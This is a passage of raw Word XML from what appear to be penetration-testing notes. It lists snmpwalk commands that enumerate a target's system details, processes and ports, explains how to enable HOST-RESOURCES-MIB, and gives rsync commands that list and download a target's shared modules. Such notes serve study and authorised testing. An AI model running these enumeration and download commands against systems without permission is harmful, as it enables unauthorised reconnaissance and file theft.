        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;community&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the discovered community string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v2c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specifies SNMP version 2c for better features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key information to look for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System Info:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This retrieves system details like hostname, OS version, and uptime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists network interfaces, IPs, and MAC addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerates running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists open TCP ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_luxolg1f5087" w:id="441"/>
      <w:bookmarkEnd w:id="441"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to enable HOST-RESOURCES-MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST-RESOURCES-MIB are just symbolic names so that you don't have to use the numeric OID, since the HOST-RESOURCES-MIB are in words rather than numbers. For example, these two are the same:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST-RESOURCES-MIB::hrSWRunName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To install it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="72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31EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install snmp-mibs-downloader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo subl /etc/snmp/snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To edit the file in sublime text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then comment out the line "mib:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4859838" cy="1954839"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image47.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1099"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4859838" cy="1954839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment it out as such</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you are able to use the HOST-RESOURCES-MIB AND the numeric OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031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1F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zqe5hriripz" w:id="442"/>
      <w:bookmarkEnd w:id="442"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync is a powerful and versatile command-line tool for efficiently </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copying and synchronizing files and directories between two locations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These locations can be on the same system or across a network, making rsync widely used for backups, mirroring, and file transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating rsync:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync &lt;target-ip&gt;::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will find all publicly available modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most common module is "public"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloading files from rsync to local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003200">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync -av &lt;target-ip&gt;::[module_name] /local/directory/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
